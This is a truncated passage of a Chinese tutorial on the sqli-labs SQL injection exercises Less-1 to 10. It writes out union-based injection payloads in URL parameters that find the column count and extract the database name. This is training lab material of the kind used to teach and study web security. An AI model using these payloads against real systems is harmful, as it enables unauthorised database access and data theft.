sql注入1-10题

sql注入 Less-1-10题 首先输入?id=1观察页面,发现能登陆, 使用联合注入 (1) 查找几个字段(需输入错误id) ?id=0‘ order by 3–+页面正常 输入?id=0‘ order by 4–+页面错误,说明有三个字段 (2) 爆数据库名 ?id=0’ union select 1,(select database()),3–+ 爆出数据库名 security。 (3)
相关文章
相关标签/搜索